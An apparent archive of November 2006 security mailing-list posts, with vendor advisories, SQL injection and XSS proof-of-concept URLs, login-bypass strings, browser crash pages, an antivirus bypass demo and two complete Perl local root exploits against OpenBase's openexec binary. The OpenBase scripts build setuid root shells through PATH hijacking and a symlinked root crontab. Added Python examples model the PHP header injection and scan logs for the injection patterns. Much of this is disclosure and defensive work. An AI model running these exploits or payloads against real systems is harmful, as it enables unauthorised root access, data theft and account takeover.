Real Estate Listing System SQL Injection
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/Real Estate Listing System.txt
#---
#Software: Real Estate Listing System
#Method : Sql Injection
#
#PoC:
#http://target/[path]/listings.asp?itemID=[SQL]
#
#Contact: [EMAIL PROTECTED]
[SECURITY] [DSA 1210-1] New Mozilla Firefox packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

--------------------------------------------------------------------------
Debian Security Advisory DSA 1210-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                          Martin Schulze
November 14th, 2006                     http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : mozilla-firefox
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs        : CVE-2006-2788 CVE-2006-4340 CVE-2006-4565 CVE-2006-4566
                 CVE-2006-4568 CVE-2006-4571
BugTraq ID     : 20042

Several security related problems have been discovered in Mozilla and
derived products such as Mozilla Firefox. The Common Vulnerabilities and
Exposures project identifies the following vulnerabilities:

CVE-2006-2788
    Fernando Ribeiro discovered that a vulnerability in the getRawDER
    function allows remote attackers to cause a denial of service (hang)
    and possibly execute arbitrary code.

CVE-2006-4340
    Daniel Bleichenbacher recently described an implementation error in
    RSA signature verification that causes the application to incorrectly
    trust SSL certificates.

CVE-2006-4565, CVE-2006-4566
    Priit Laes reported that a JavaScript regular expression can trigger
    a heap-based buffer overflow which allows remote attackers to cause a
    denial of service and possibly execute arbitrary code.

CVE-2006-4568
    A vulnerability has been discovered that allows remote attackers to
    bypass the security model and inject content into the sub-frame of
    another site.

CVE-2006-4571
    Multiple unspecified vulnerabilities in Firefox, Thunderbird and
    SeaMonkey allow remote attackers to cause a denial of service, corrupt
    memory, and possibly execute arbitrary code.

For the stable distribution (sarge) these problems have been fixed in
version 1.0.4-2sarge12.

For the unstable distribution (sid) these problems have been fixed in
version 1.5.dfsg+1.5.0.7-1 of firefox.

We recommend that you upgrade your Mozilla Firefox package.

Upgrade Instructions

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge

Source archives:
ASPintranet SQL Injection
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/ASPintranet.txt
#---
#Software: ASPintranet
#Method : Sql Injection
#
#PoC:
#http://target/[path]/default.asp?a=[SQL]
#
#Contact: [EMAIL PROTECTED]
SiteXpress SQL Injection
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/SiteXpress.txt
#---
#Software: SiteXpress E-Commerce System
#Method : SQL Injection
#
#PoC:
#http://target/[path]/
#http://target/[path]/dept.asp?id=[SQL]
#
#Contact: [EMAIL PROTECTED]
WWWeb Cocepts SQL Injection
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/WWWeb Cocepts.txt
#---
#Software: WWWeb Cocepts
#Method : Sql Injection
#
#PoC:
#http://target/[path]/prodtype.asp?prodtype=[SQL]
#http://target/[path]/product.asp?product=[SQL]
#
#Contact: [EMAIL PROTECTED]
Ustore SQL Injection
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/UStore.txt
#---
#Software: UStore | E-Commerce in 15-Minutes
#Method : Sql Injection
#
#PoC:
#http://target/[path]/detail.asp?ID='=[SQL]
#
#Contact: [EMAIL PROTECTED]
eShopping SQL Injection
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/ecommercestore.txt
#---
#Software: E Commerce Store Shop Builder
#Method : SQL Injection
#
#PoC:
#http://target/path/fulldetails.asp?brand=idcategory=scata=idProduct=[SQL INJECTION]
#http://target/path/categories.asp?id=[SQL INJECTION]
#
#Contact: [EMAIL PROTECTED]
ECommerce Store Shop Builder
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/eShopping.txt
#---
#Software: eShopping Cart
#Method : SQL Injection
#
#PoC:
#http://target/productdetail.asp?ProductID=[SQL CODE]
#http://target/products.asp?categoryid=[SQL CODE]
#
#Contact: [EMAIL PROTECTED]
Engine Manager SQL Injection
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/Engine Manager.txt
#---
#Software: Engine Manager
#Method: SQL Injection
#
#PoC:
#http://target/[path]index.asp?mid=[SQL Injection]
#
#Contact: [EMAIL PROTECTED]
BPG Content Management System SQL Injection
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/bpg.txt
#---
#Software: BPG Content Management System
#Method: SQL Injection
#
#PoC:
#http://target/[path]/publication_view.asp?InfoID=[SQL CODE]
#http://target/[path]/publications_list.asp?vjob=[SQL Injection]
#
#Contact: [EMAIL PROTECTED]
Advisory 14/2006: Dotdeb PHP Email Header Injection Vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

                        Hardened-PHP Project
                        www.hardened-php.net

                      -= Security  Advisory =-

     Advisory: Dotdeb PHP Email Header Injection Vulnerability
 Release Date: 2006/11/14
Last Modified: 2006/11/14
       Author: Stefan Esser [EMAIL PROTECTED]

  Application: Dotdeb PHP 5.2.0 Rev 3
     Severity: Calling PHP scripts with specially crafted URLs can
               result in arbitrary email header injection
         Risk: Critical
Vendor Status: Vendor has fixed this with Dotdeb PHP 5.2.0 rev 3
   References: http://www.hardened-php.net/advisory_142006.139.html

Overview:

   Quote from http://www.dotdeb.org

   Dotdeb is an unofficial repository containing many packages for the
   Debian stable (aka "Sarge") distribution :
     * PHP, versions 4 & 5,
     * MySQL, versions 4.1 & 5.0,
     * Qmail,
     * Vpopmail...
   Its goal is to turn easily your Debian GNU/Linux boxes into
   powerful, stable and up-to-date LAMP servers.

   It was discovered that the Dotdeb PHP packages are patched with a
   mail() protection patch that was originally created by Steve Bennett
   and is nowadays developed at choon.net. This patch adds an
   X-PHP-Script header to outgoing mails that contains the name of the
   server, the script and the calling IP.

   Unfortunately the script name is directly copied from PHP's PHP_SELF
   variable without further processing. Because PHP_SELF does not only
   contain the script name but also the urldecoded content of PATH_INFO
   this allows injection of arbitrary content into the email headers.

   Because of this vulnerability on every PHP server that uses this
   patch every PHP script that uses the mail() function can be used to
   send either spam mail or tricked into disclosing sensitive content by
   injecting Bcc: headers. A possible attack could be injecting Bcc:
   headers into password reminder/password reset mails sent out by
   forums to break into the administrator account.

Proof of Concept:

   The Hardened-PHP Project is not going to release a proof of concept
   exploit for this vulnerability.

Disclosure Timeline:

   10. November 2006 - Notified dotdeb vendor and choon.net
   12. November 2006 - choon.net released updated patch
   13. November 2006 - dotdeb released updated PHP packages
   14. November 2006 - Public Disclosure

Recommendation:

   We strongly recommend upgrading your dotdeb installation as soon as
   possible, because it not only fixes this vulnerability but also
   bundles our Suhosin Patch for extra protection of your PHP server.

   You can get the packages from:
   http://packages.dotdeb.org

   If you want more information about the Suhosin Patch then go to:
   http://www.hardened-php.net/suhosin/index.html

GPG-Key:
   http://www.hardened-php.net/hardened-php-signature-key.asc
   pub  1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
   Key fingerprint = 066F A6D0 E57E 9936 9082  7E52 4439 14CC 0A86 4AA1

Copyright 2006 Stefan Esser. All rights reserved.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFFWfxoRDkUzAqGSqERAoX6AKCY+qlKNJkLIYvMYdhyTEXi1/WtfACg4szt
zeDfTedyMjrarD7lYVLvvB0=
=BcU5
-END PGP SIGNATURE-
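An added example (not part of the advisory, and not the choon.net patch itself) that models the mechanism the advisory describes: a header value built from PHP_SELF inherits the url-decoded PATH_INFO, so an encoded CR/LF splits the X-PHP-Script line and an attacker-supplied field lands in the header block. The exact header layout, the hostnames, addresses and the request path are constructed assumptions; the hardened builder uses SCRIPT_NAME and strips control characters.

```python
from urllib.parse import unquote

CRLF = "\r\n"


def php_self(script_name, path_info_raw):
    """Mimic PHP_SELF: the script name followed by the url-decoded PATH_INFO."""
    return script_name + unquote(path_info_raw)


def x_php_script_unsafe(server, php_self_value, client_ip):
    """X-PHP-Script as the vulnerable patch built it (layout assumed):
    the script path goes in exactly as PHP_SELF supplied it."""
    return "X-PHP-Script: %s%s for %s" % (server, php_self_value, client_ip)


def header_safe(value):
    """Strip CR, LF and every other control character from a header value,
    so the value can never terminate the header field it belongs to."""
    return "".join(ch for ch in value if ch >= " " and ch != "\x7f")


def x_php_script_safe(server, script_name, client_ip):
    """Hardened form: take SCRIPT_NAME (which never carries PATH_INFO) and
    filter it anyway, so the header is a single line by construction."""
    return "X-PHP-Script: %s for %s" % (header_safe(server + script_name),
                                        header_safe(client_ip))


def build_message(extra_header, to, subject, body):
    """Assemble a minimal message the way mail() hands it to the MTA."""
    return CRLF.join(["To: " + to, "Subject: " + subject, extra_header, "", body])


def header_names(message):
    """Header field names as an MTA sees them: the block before the first
    blank line, one field per line, continuation lines fold into the previous."""
    block = message.split(CRLF + CRLF, 1)[0]
    names = []
    for line in block.split(CRLF):
        if line[:1] in (" ", "\t"):
            continue
        names.append(line.split(":", 1)[0].strip())
    return names


# Constructed request: a password-reset script reached through PATH_INFO
# that carries an encoded CRLF followed by a Bcc: field.
SERVER = "forum.example"
SCRIPT_NAME = "/reset.php"
PATH_INFO_RAW = "/%0d%0aBcc:%20injected@example.net"
CLIENT_IP = "192.0.2.10"


def compare(path_info_raw=PATH_INFO_RAW):
    """Return the header names of the vulnerable and of the hardened message."""
    unsafe = build_message(
        x_php_script_unsafe(SERVER, php_self(SCRIPT_NAME, path_info_raw), CLIENT_IP),
        "user@example.org", "Password reset", "...")
    safe = build_message(
        x_php_script_safe(SERVER, SCRIPT_NAME, CLIENT_IP),
        "user@example.org", "Password reset", "...")
    return header_names(unsafe), header_names(safe)


if __name__ == "__main__":
    vulnerable, hardened = compare()
    print("vulnerable patch:", vulnerable)   # an extra Bcc field appears
    print("hardened:        ", hardened)
```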
Apple Safari match Buffer Overflow Vulnerability
The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4. A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. Successful exploitation could lead to remote code execution.

<script>
var reg = /(.)*/;
var z = 'Z';
while (z.length < 8192) z += z;   // grow the string to 8192 characters
var boum = reg.exec(z);
</script>
Re: [ GLSA 200611-03 ] NVIDIA binary graphics driver: Privilege escalation vulnerability
Raphael Marichez to Nick Boyce (??):

>> um ... doesn't that make it a *remote* privilege escalation ?
>
> in a certain way... you're right... although that requires the user
> complicity, strictly speaking, you're right.

Makes it no less remote. Not _automatic_ remote, but still very, very much remote.

> The guy who would manage to remotely root a box with that vulnerability
> would be really good. The real serious risk is local only. (think about
> all that unpatched linux boxes in the universities...)

You have a really odd view of the security exposure...

Even _Microsoft_ (now) self-rates this type of vulnerability as critical and remotely exploitable for execution of arbitrary code (e.g. the WMF vuln from late last year). OK -- so we can quibble over whether it released patches quickly enough in that case (no), but at least even the traditionally considered slackest of security slackers gets the rating of the severity and scope of this kind of vuln right.

Any hope of Linux distro folk getting that clued?

Regards,

Nick FitzGerald
Re: [ GLSA 200611-03 ] NVIDIA binary graphics driver: Privilege escalation vulnerability
Nick Boyce wrote:

> On 11/7/06, Raphael Marichez [EMAIL PROTECTED] wrote:
>
>> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>> Gentoo Linux Security Advisory                           GLSA 200611-03
>> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>> http://security.gentoo.org/
>> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>> Severity: High
>> Title: NVIDIA binary graphics driver: Privilege escalation vulnerability
>> Date: November 07, 2006
>> Bugs: #151635
>> ID: 200611-03
>> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>>
>> Synopsis
>>
>> The NVIDIA binary graphics driver is vulnerable to a local privilege
>> escalation
>
> [snip]
>
>> An X client could trigger the buffer overflow with a maliciously
>> crafted series of glyphs. A remote attacker could also entice a user
>> to open a specially crafted web page, document or X client that will
>> trigger the buffer overflow.
>
> um ... doesn't that make it a *remote* privilege escalation ?

Well, any file parsing bug could be considered a remote vulnerability if you consider the prospect of downloading a malicious file from the internet.

I don't think that remote X clients are an issue; the last time I checked, the driver in question was only used for direct rendering, which requires a local X client, while indirect rendering uses the built-in software renderer.

-- 
Glynn Clements [EMAIL PROTECTED]
Inventory Manager [injection sql xss (get)]
vendor site: http://www.websitedesignsforless.com/
product: Inventory Manager
bug: injection sql xss (get)
risk: medium

injection sql :
http://site.com/inventory/inventory/display/imager.asp?pictable='[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]picfield=[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]picfield=photowhere='[sql]

xss get :
http://site.com/inventory/inventory/display/display_results.asp?category=/textarea'scriptalert(document.cookie)/script

laurent gaffié
benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
Evolve Merchant[ injection sql ]
vendor site: http://www.lynxinternet.com/
product: Evolve Merchant
bug: injection sql
risk: medium

injection sql (get) :
http://site.com/viewcart.asp?zoneid='[sql]

laurent gaffié
benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
Car Site Manager [injection sql xss (get)]
vendor site: http://www.mginternet.com/
product: Car Site Manager
bug: injection sql
risk: medium

injection sql :
http://site.com/csm/asp/detail.asp?l=p='[sql]
http://site.com/csm/asp/listings.asp?l='[sql]
http://site.com/csm/asp/listings.asp?s=searchtyp='[sql]
http://site.com/csm/asp/listings.asp?s=searchtyp=4loc='[sql]

xss (get):
http://site.com/csm/asp/listings.asp?s=/textarea'scriptalert(document.cookie)/script

laurent gaffié
benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
Re: New Bug MiniBB Forum = 2 Remote File Include (index.php)
This is bogus; about 5-10 lines above it includes a file which declares $pathToFiles.

include ('./setup_options.php');

if(!isset($startIndex)) $startIndex=$indexphp;
if(!isset($manualIndex)) $manualIndex=$indexphp.'action=manual';
$langOrig=$lang;
$indexphp=(!isset($GLOBALS['indexphp'])?'index.php':$GLOBALS['indexphp']);
if(!isset($manualIndex)) $manualIndex=$indexphp.'action=manual';
if(isset($mod_rewrite) and $mod_rewrite) $queryStr=str_replace(array('%3D0%26mdrw%3Don', 'amp;mdrw=on'), '', $queryStr);
if($useSessions) {
    $sessname=ini_get('session.name');
    if($sessname=='') $sessname='PHPSESSID';
    session_start();
    if(!isset($$sessname)) {
        $indexphp.=SID.'';
        $bb_admin.=SID.'';
    } else {
        $indexphp.={$sessname}=.$$sessname.'';
        $bb_admin.={$sessname}=.$$sessname.'';
    }
}

include ($pathToFiles.'setup_'.$DB.'.php');
include ($pathToFiles.'bb_cookie.php');
include ($pathToFiles.'bb_functions.php');
include ($pathToFiles.'bb_specials.php');
FunkyASP Glossary v1.0 [injection sql]
vendor site: http://www.funkyasp.co.uk/
product: FunkyASP Glossary v1.0
bug: injection sql
risk: medium

injection sql :
http://www.demo.funkyasp.co.uk/demo/glossary/glossary.asp?alpha='[sql]

laurent gaffié
benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
Blogme v3 [admin login bypass xss (post)]
vendor site: http://www.drumster.net/
product: Blogme v3
bug: login bypass xss (post)
risk: high

admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '

xss post :
in: /comments.asp?blog=85
vulnerable fields:
- Name
- URL
- Comments

laurent gaffié
benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
Property Site Manager [login bypass ,multiples injection sql xss (get)]
vendor site: http://www.mginternet.com/
product: Property Site Manager
bug: injection sql, login bypass, xss
risk: medium

login bypass :
just login with :
user: 'or''='
passwd: 'or''='

injection sql :
http://site.com/asp/detail.asp?l=p='[sql]
http://site.com/asp/listings.asp?l='[sql]
http://site.com/asp/listings.asp?s=searchtyp='[sql]
http://site.com/asp/listings.asp?s=searchtyp=4loc='[sql]

xss (get):
http://site.com/asp/listings.asp?s=/textarea'scriptalert(document.cookie)/script

laurent gaffié
benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
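The Aria-Security and s-a-p posts above all report the same two request patterns against classic ASP pages (a quote in a query parameter, or script markup in a GET parameter). As an added example, not part of any of those posts, the following scans an IIS W3C extended log for those patterns; the log excerpt is constructed, with script paths borrowed from the advisories, and the two detection rules are assumptions about what a defender would look for.

```python
import re
from urllib.parse import parse_qsl

# A quote, a SQL comment opener, or UNION ... SELECT in a decoded value.
SQLI = re.compile(r"'|--|/\*|\bunion\b.*\bselect\b", re.IGNORECASE)
# Markup or a script URL in a decoded value (the XSS PoCs above close a
# textarea and open a script tag).
XSS = re.compile(r"<\s*/?\s*(script|textarea|iframe|img)\b|javascript:", re.IGNORECASE)


def parse_w3c(log_text):
    """Yield one dict per request line of an IIS W3C extended log, taking the
    column names from the #Fields directive; malformed lines are skipped."""
    fields = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue                      # other directives (#Software, #Date)
        parts = line.split(" ")
        if not fields or len(parts) != len(fields):
            continue
        yield dict(zip(fields, parts))


def suspicious_params(uri_query):
    """Return (parameter, decoded value, reason) for each query parameter
    whose decoded value trips the SQL or the script rule."""
    findings = []
    if uri_query in ("", "-"):            # IIS logs '-' for an empty query
        return findings
    for name, value in parse_qsl(uri_query, keep_blank_values=True):
        if SQLI.search(value):
            findings.append((name, value, "sqli"))
        elif XSS.search(value):
            findings.append((name, value, "xss"))
    return findings


def scan(log_text):
    """Flag every request in the log whose query string trips either rule."""
    hits = []
    for rec in parse_w3c(log_text):
        for param, value, reason in suspicious_params(rec.get("cs-uri-query", "-")):
            hits.append({
                "time": rec["date"] + " " + rec["time"],
                "client": rec["c-ip"],
                "stem": rec["cs-uri-stem"],
                "param": param,
                "value": value,
                "reason": reason,
            })
    return hits


# Constructed log excerpt; the script paths follow the advisories above.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-11-14 10:01:02 203.0.113.5 GET /shop/listings.asp itemID=42 200
2006-11-14 10:01:09 203.0.113.5 GET /shop/listings.asp itemID=42' 500
2006-11-14 10:02:30 198.51.100.7 GET /csm/asp/listings.asp s=%3C%2Ftextarea%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E 200
2006-11-14 10:03:11 198.51.100.7 GET /inventory/inventory/display/imager.asp pictable=inventory&picfield=photo 200
2006-11-14 10:04:00 203.0.113.9 GET /glossary/glossary.asp alpha=a 200
2006-11-14 10:04:05 203.0.113.9 GET /glossary/glossary.asp alpha=a'%20or%20'1'='1 200
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("%(time)s %(client)s %(stem)s %(param)s=%(value)r [%(reason)s]" % hit)
```

The 500 on the second line is the tell-tale that the quote reached the database layer; correlating the flagged request with the status code is what makes the alert worth a ticket.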
[Fwd: DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit']
I think the list spam trap ate this message a few weeks ago.

---BeginMessage---

This was supposed to go out on Halloween but it didn't... but either way all you Mac users can get scared or something. OOGA BOOGA!

DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'

Author: Kevin Finisterre
Vendor(s): http://www.intego.com
Product: 'Intego VirusBarrier X4 = VirusBarrierX47070.dmg'
References: http://www.digitalmunition.com/DMA[2006-1031a].txt

Description:

Intego VirusBarrier X4 is the simple, fast and non-intrusive antivirus security solution for Macintosh computers, by Intego, the leading publisher of personal security software for Macintosh. It offers thorough protection against viruses of all types, coming from infected files or applications, whether on CD-ROMs, DVDs or other removable media, or on files downloaded over the Internet or other types of networks. Intego VirusBarrier X4 protects your computer from viruses by constantly examining all the files that your computer opens and writes, as well as watching for suspicious activity that may be the sign of viruses acting on applications or other files. With Intego VirusBarrier X4 on your computer, you can rest assured that your Macintosh has the best protection available against viruses of all kinds.

Although VirusBarrier does a pretty good job of halting malicious activity the product currently suffers from a flaw related to the amount of alerts that it can process simultaneously. If an attacker is able to trigger multiple alerts in succession within a very short amount of time he or she may be able to cause VirusBarrier to completely ignore positive matches against virus definitions. The consequences of ignored matches may include full system compromise or further spreading of malware.

As an example we will show how VirusBarrier normally stops a local root exploit with behavior similar to 'OSX.ExploitMachex.A', then we will demonstrate how the VirusBarrier protection can be bypassed by using a simple flood of Eicar Test files.

Any typical attempt to access or execute a file or program that is a match for a VirusBarrier definition results in an alert on the user interface. There is a sweet lookin insulin bottle on the screen that slowly empties as the virus nears eradication.

    'excploit' is infected by 'OSX.ExploitMachex.A'
    What would you like to do ('Ignore' || 'Repair')?

Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus program existed at all.

    virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
    uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)

On the other hand if you chose 'Repair' the process is terminated dead in its tracks and the file is nulled out:

    virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
    -bash: ./excploit: Operation not permitted
    virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit
    -rwxr-xr-x   1 virusbar  wheel  0 Oct 31 02:02 excploit

The above output demonstrates how Virusbarrier is supposed to work. Under normal circumstances this would be adequate to stop a malicious attack. If however an attacker floods the file system with dummy virus files at a quick rate the VirusBarrier software will promptly stop responding after presenting the user with a few audible and visual alerts. After about 40 some odd infected files in a row the system will become confused and in some cases VirusBarrier may stop responding completely. (Intego confirmed a limit of 20 files)

When under attack the user may see dozens of messages on the screen. With our example code the messages are similar to the following:

    '0.92815455662033' is infected by 'EICAR Test'
    What would you like to do ?

From the attackers standpoint the exploitation is fairly quick and simple. Our example uses a local root exploit however this tactic could easily be applied to any existing malware technique that Intego VirusBarrier protects against. Code could in theory be run as a precursor to an InqTana attack as a means to bypass the Intego protection. The existing signatures for InqTana A B C and D would then be completely useless and an E variant would be born.

    virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
    virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
    Pwntego.pl  Pwntego.sh  README.txt  pwntego.uu  rand-eicar.pl
    virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl
    rm: /tmp/objc_sharing_ppc_92: Permission denied
    ;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
    ;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
    ;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
    Injecting pwnacillin shot
    ;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel)
Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
7245 correctly resolves this issue; standard stack overflow in WZFILEVIEW.FilePattern snatching EIP; PoC below;

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<SCRIPT LANGUAGE="VBScript">
<!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
    WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE"
end sub
-->
</SCRIPT>
<OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
    CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
</OBJECT>
</BODY>
</HTML>

-- prdelka
[Fwd: OpenBase SQL multiple vulnerabilities Part Deux]
I think the list spam trap ate this message a few weeks ago.

---BeginMessage---

#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# = ftp://www.openbase.com/pub/OpenBase_10.0 (vulnerable) ?
#
# This is some fairly blatant and retarded use of system()
#
# cd cp chmod chown rm mkdir and killall appear as strings in the binary hrmm can you say system() !
# -restart -MachLaunch -launch -noexit -install_plugins -kill -install -uninstall and -deactivate all
# *may* be used to trigger these issues.
#
# I don't feel like seeing which flags call which binaries... just 3 is plenty to prove the point.
#
# Tested against OpenBase10.0.0_MacOSX.dmg

$binpath = /Library/OpenBase/bin/openexec; # Typical location.

$tgts{0} = cp:$binpath -install;
$tgts{1} = killall:$binpath -kill;
$tgts{2} = rm:$binpath -uninstall;

unless (($target) = @ARGV) {
    print \n\nUsage: $0 target \n\nTargets:\n\n;
    foreach $key (sort(keys %tgts)) {
        ($a,$b) = split(/\:/,$tgts{$key});
        print \t$key . $a - $b\n;
    }
    print \n;
    exit 1;
}

$ret = pack(l, ($retval));
($a,$b) = split(/\:/,$tgts{$target});
print *** Target: $a - $b\n;

open(OP,/tmp/finisterre.c);
printf OP main()\n;
printf OP { seteuid(0); setegid(0); setuid(0); setgid(0); system(\chown root: /tmp/pwns ; chmod 4775 /tmp/pwns\); }\n;

open(OP,/tmp/pwns.c);
printf OP main()\n;
printf OP { seteuid(0); setegid(0); setuid(0); setgid(0); system(\/bin/sh -i\); }\n;

system(gcc -o /tmp/finisterre /tmp/finisterre.c);
system(gcc -o /tmp/pwns /tmp/pwns.c);
system(echo /bin/cp /tmp/finisterre /tmp/$a);
system(/bin/cp /tmp/finisterre /tmp/$a);
system(export PATH=/tmp:\$PATH; $b);
system(/tmp/pwns);


#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# = ftp://www.openbase.com/pub/OpenBase_10.0 (vulnerable) ?
#
# Create a new file anywhere on the filesystem with rw-rw-rw privs.
# Sorry you can NOT overwrite existing files.
#
# Writing to roots crontab seems to be fairly prompt at handing out root shells
# Make sure that you get cron running by first creating a user crontab!
#
# The openexec binary creates a root owned log file in /tmp/
# Following symlinks is bad mmkay!
#
# Tested against OpenBase10.0.0_MacOSX.dmg

$dest = /var/cron/tabs/root;
$binpath = /Library/OpenBase/bin/openexec; # Typical location.

# In this instance targets are really pointless but I wanted to archive known vulnerable versions while testing.
$tgts{0} = OpenBase10.0.0_MacOSX.dmg:$binpath;

unless (($target) = @ARGV) {
    print \n\nUsage: $0 target \n\nTargets:\n\n;
    foreach $key (sort(keys %tgts)) {
        ($a,$b) = split(/\:/,$tgts{$key});
        print \t$key . $a\n;
    }
    print \n;
    exit 1;
}

$ret = pack(l, ($retval));
($a,$b) = split(/\:/,$tgts{$target});
print *** Target: $a $b\n;

open(OP,/tmp/finisterre.c);
printf OP main()\n;
printf OP { seteuid(0); setegid(0); setuid(0); setgid(0); system(\/bin/sh -i\); }\n;
system(gcc -o /Users/Shared/shX /tmp/finisterre.c);

# Create a user crontab FIRST! This ensures that cron is running when the fake root crontab is created. Aka semi-insta-root (in a minute)
system(echo '* * * * * /usr/bin/id /tmp/aa' /tmp/user_cron);
system(crontab /tmp/user_cron);

# The umask is where the lovin occurs. I'm rw-rw-rw James bitch!!
system(ln -s $dest /tmp/output);
sleep 60; # Probably don't need to wait this long but whatever...
system(umask 111; $b -deactivate);
print $dest should be rw-rw-rw ... enjoy!\n;
print installing trojan crontab for root\n;
system(echo '* * * * * /usr/sbin/chown root: /Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX' /var/cron/tabs/root);
print sit around and chill for a minute then check /Users/Shared/shX !\n;
sleep 60 ;
system(/Users/Shared/shX);


DMA[2006-1107a] - 'OpenBase SQL multiple vulnerabilities Part Deux'

Author: Kevin Finisterre
Vendor(s): http://www.openbase.com
Product: 'OpenBase SQL =10.0 (?)'
References: http://www.digitalmunition.com/DMA[2006-1107a].txt

Description:

(regurgitation warning - this may taste VERY familiar)

For over a decade, the OpenBase family of products have been enabling some of the most innovative business applications at work today. With thousands of customers worldwide, OpenBase has become a brand that companies can rely on. OpenBase customers include ATT, Adobe Systems, Canon, Walt Disney, First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image and many other innovators worldwide.

As mentioned previously several setuid root binaries from OpenBase SQL are placed in /Library/OpenBase/bin during the installation of WebObjects support for Xcode or during a standard OpenBase install. In this particular instance we will be dealing only with the openexec binary.

    pwnercycles-ibook:/tmp pwnercycle$ ls -al
EEYE: Workstation Service NetpManageIPCConnect Buffer Overflow
eEye Research - http://research.eeye.com

Workstation Service NetpManageIPCConnect Buffer Overflow

Release Date:  November 14, 2006
Date Reported: July 25, 2006
Severity:      High (Remote Code Execution)
Vendor:        Microsoft

Systems Affected:
  Windows 2000   (Remote Code Execution)
  Windows XP SP1 (Local Privilege Escalation)

Overview:

A flaw exists in a default Windows component called the Workstation Service that when exploited allows for remote code execution in SYSTEM context, allowing an attacker to take complete control of affected systems.

Technical Details:

In the Workstation Service module called wkssvc.dll, the NetpManageIPCConnect function has a call to swprintf with an unchecked buffer. The input buffer is controllable by the remote attacker.

